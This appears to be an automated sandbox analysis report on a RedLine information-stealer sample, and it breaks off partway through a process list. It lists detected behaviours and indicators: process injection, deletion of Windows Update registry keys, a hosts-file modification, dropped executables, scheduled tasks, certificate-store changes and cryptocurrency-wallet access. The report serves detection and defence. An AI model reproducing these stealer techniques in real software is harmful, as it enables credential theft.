Analysis Overview
SHA256
34efda61716ff1db7297813317e194d4eaa74ae5209810ef6045aabab2af3179
Threat Level: Known bad
The file 1d678410484e34165adb652f7e86a2b5cae5f58d was found to be: Known bad.
Malicious Activity Summary
RedLine
Modifies security service
RedLine payload
Suspicious use of NtCreateProcessExOtherParentProcess
Suspicious use of NtCreateUserProcessOtherParentProcess
Drops file in Drivers directory
Executes dropped EXE
Blocklisted process makes network request
Downloads MZ/PE file
Stops running service(s)
Uses the VBS compiler for execution
Accesses cryptocurrency files/wallets, possible credential harvesting
Drops file in System32 directory
Suspicious use of SetThreadContext
Launches sc.exe
Drops file in Program Files directory
Program crash
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Enumerates system info in registry
Checks processor information in registry
Suspicious use of WriteProcessMemory
Suspicious use of UnmapMainImage
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-01-28 19:05
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-01-28 19:05
Reported
2023-01-28 19:08
Platform
win7-20221111-en
Max time kernel
27s
Max time network
30s
Command Line
Signatures
Uses the VBS compiler for execution
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1576 set thread context of 1544 | N/A | C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe
"C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1576 -s 48
Network
Files
memory/1544-54-0x0000000000400000-0x0000000000405000-memory.dmp
memory/1544-56-0x0000000000400000-0x0000000000405000-memory.dmp
memory/1544-62-0x0000000000401159-mapping.dmp
memory/472-63-0x0000000000000000-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-01-28 19:05
Reported
2023-01-28 19:08
Platform
win10v2004-20220812-en
Max time kernel
151s
Max time network
119s
Command Line
Signatures
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | C:\Windows\System32\reg.exe | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4440 created 3344 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\DllHost.exe |
| PID 1356 created 3452 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\DllHost.exe |
| PID 3736 created 2348 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\DllHost.exe |
| PID 5024 created 4328 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\DllHost.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3992 created 2824 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 3992 created 2824 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 3992 created 2824 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 3992 created 2824 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 836 created 604 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 4444 created 3344 | N/A | C:\Windows\System32\svchost.exe | C:\Windows\system32\DllHost.exe |
| PID 4444 created 3452 | N/A | C:\Windows\System32\svchost.exe | C:\Windows\system32\DllHost.exe |
| PID 4444 created 2348 | N/A | C:\Windows\System32\svchost.exe | C:\Windows\system32\DllHost.exe |
| PID 4444 created 4328 | N/A | C:\Windows\System32\svchost.exe | C:\Windows\system32\DllHost.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C4Loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\new2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SysApp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe | N/A |
Stops running service(s)
Uses the VBS compiler for execution
Accesses cryptocurrency files/wallets, possible credential harvesting
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Telemetry Logging | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3900 set thread context of 5068 | N/A | C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
| PID 4348 set thread context of 2308 | N/A | C:\Users\Admin\AppData\Local\Temp\new2.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
| PID 3992 set thread context of 1924 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\System32\dialer.exe |
| PID 836 set thread context of 2340 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Program crash
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sat, 28 Jan 2023 19:06:26 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s W32Time
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
